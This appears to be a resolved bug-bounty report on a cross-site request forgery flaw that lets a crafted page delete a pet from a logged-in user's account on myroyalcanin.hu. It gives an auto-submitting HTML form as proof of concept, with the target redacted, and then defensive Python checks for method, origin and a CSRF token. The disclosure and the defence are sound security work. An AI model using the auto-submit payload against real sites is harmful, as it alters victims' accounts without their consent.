# CSRF to delete a pet

Severity: Medium

## Vulnerability Details
## Summary:
The `/kisallataim/ANIMAL_ID/delete` API endpoint at **myroyalcanin.hu** is vulnerable to Cross-Site Request Forgery (CSRF): the request that deletes a pet carries no anti-CSRF token and is accepted from a cross-site form submission.
This allows an attacker who gets a logged-in user to visit a crafted page to delete a pet from that user's account.
(Sorry for my English, I'm French)
## Proof-of-Concept (PoC)
```html
<html>
  <body>
    <!-- The form action is redacted in the original report; it points at the
         delete endpoint for the victim's pet. No method is set, so the browser
         submits a GET with the victim's session cookies attached. -->
    <form action="████">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Auto-submit as soon as the page loads, so no user interaction is needed.
      document.forms[0].submit();
    </script>
  </body>
</html>
```
Replace **ANIMAL_ID** in the endpoint URL with the ID of the victim's pet you wish to delete.
## Impact
An attacker can exploit this CSRF in order to delete the victim's pet.
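The fix on the server side is to refuse state changes that arrive the way the PoC sends them. The following check is an added illustration written for this report, not Royal Canin's code; the request dictionary shape, the `SITE_ORIGIN` value and the session store are assumptions. It rejects GET for a delete, requires the `Origin` (or `Referer`) header to match the first-party origin, and verifies a per-session synchronizer token, with a `SameSite` session cookie as defence in depth.

```python
"""Server-side CSRF checks for a state-changing endpoint such as
/kisallataim/<ANIMAL_ID>/delete.

Added example, not the site's own code. The request dict shape, SITE_ORIGIN
and the session store are assumptions made for illustration.
"""
import hmac
import secrets
from typing import Optional, Tuple
from urllib.parse import urlsplit

SITE_ORIGIN = "https://myroyalcanin.hu"  # assumed first-party origin


def issue_csrf_token(session: dict) -> str:
    """Mint a per-session synchronizer token and store it server-side.

    The server embeds the returned value in the delete form as a hidden field;
    a cross-site page cannot read it, so it cannot include it in a forged post.
    """
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def _origin_of(url: Optional[str]) -> Optional[str]:
    """Reduce a URL to scheme://host[:port], or None if it has no authority."""
    if not url:
        return None
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}"


def check_csrf(request: dict, session: dict) -> Tuple[bool, str]:
    """Return (allowed, reason) for a state-changing request.

    request: {"method": str, "headers": {...}, "form": {...}} (constructed shape)
    session: the authenticated user's server-side session store
    """
    # 1. A delete must not be reachable via GET: any <form>, <img> or link on a
    #    third-party page fires a GET that the browser decorates with cookies.
    if request.get("method", "").upper() != "POST":
        return False, "method not allowed for a state change"

    headers = {k.lower(): v for k, v in request.get("headers", {}).items()}

    # 2. Origin (fallback Referer) must be the first-party origin. Browsers set
    #    Origin on cross-site form posts and scripts cannot override it.
    origin = _origin_of(headers.get("origin")) or _origin_of(headers.get("referer"))
    if origin != SITE_ORIGIN:
        return False, f"cross-site origin {origin!r}"

    # 3. Synchronizer token: the form must echo the token bound to this session.
    #    compare_digest on bytes avoids both timing leaks and TypeErrors on
    #    non-ASCII input.
    expected = session.get("csrf_token")
    supplied = request.get("form", {}).get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid CSRF token"

    return True, "ok"


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value for the session cookie.

    SameSite=Lax makes the browser omit the cookie on cross-site POSTs and
    subresource loads; it is still sent on top-level GET navigations, which is
    exactly why rule 1 above refuses GET for deletes.
    """
    return f"session={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"
```

Rule 2 alone is not sufficient (some clients strip `Referer`, and a missing `Origin` must be treated as a failure, which the code does by comparing `None` against the site origin), and rule 3 alone does not help if the endpoint also accepts GET without the token; the three checks are meant to be applied together.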
## Report Stats
- Report ID: 2029753
- State: Closed
- Substate: resolved
- Upvotes: 20